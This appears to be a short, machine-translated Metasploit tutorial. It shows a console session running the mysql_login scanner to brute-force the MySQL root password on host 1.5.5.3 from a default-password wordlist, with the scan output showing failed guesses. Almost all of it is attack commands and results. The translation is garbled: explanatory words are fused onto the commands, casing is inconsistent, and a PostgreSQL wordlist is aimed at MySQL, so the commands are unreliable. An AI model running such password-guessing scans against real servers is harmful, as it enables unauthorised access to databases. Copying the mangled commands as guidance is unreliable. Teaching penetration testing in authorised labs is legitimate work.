MSF > DB_CONNECT-Y/opt/metasploit/apps/pro/ui/config/database.yml MSF connectivity database
[*] Rebuilding the module cache in the background ...
MSF > Db_status View Database Connection status
[*] PostgreSQL connected to MSF3
MSF > Use auxiliary/scanner/mysql/mysql_login load scan module
MSF auxiliary (mysql_login) > Set RHOSTS 1.5.5.3 Destination IP address
RHOSTS = 1.5.5.3
MSF auxiliary (mysql_login) > set USERNAME root target user name is typically root
USERNAME = root
MSF auxiliary (mysql_login) > set
Pass_file/pen/msf3/data/wordlists/postgres_default_pass.txt Password Dictionary Road strength, road strength random fill
Pass_file =/pen/msf3/data/wordlists/postgres_default_pass.txt
MSF auxiliary (mysql_login) > exploit start scanning
[*] 1.5.5.3:3306 mysql–found remote MYSQL version 5.5.16
[*] 1.5.5.3:3306 mysql–[1/7]–trying username: ' Root ' with password: '
[*] 1.5.5.3:3306 mysql–[1/7]–failed to login as ' root ' with password "
[*] 1.5.5.3:3306 mysql–[2/7]–trying username: ' Root ' with password: ' Root '
[*] 1.5.5.3:3306 mysql–[2/7]–failed to login as ' root ' with password ' root '
[*] 1.5.5.3:3306 mysql–[3/7]–trying username: ' Root ' with password: ' Tiger '
[*] 1.5.5.3:3306 mysql–[3/7]–failed to login as ' root ' with password ' tiger '
[*] 1.5.5.3:3306 mysql–[4/7]–trying username: ' Root ' with password: ' Postgres '
Can scan out the main look at the password dictionary
Metasploit scan MySQL weak password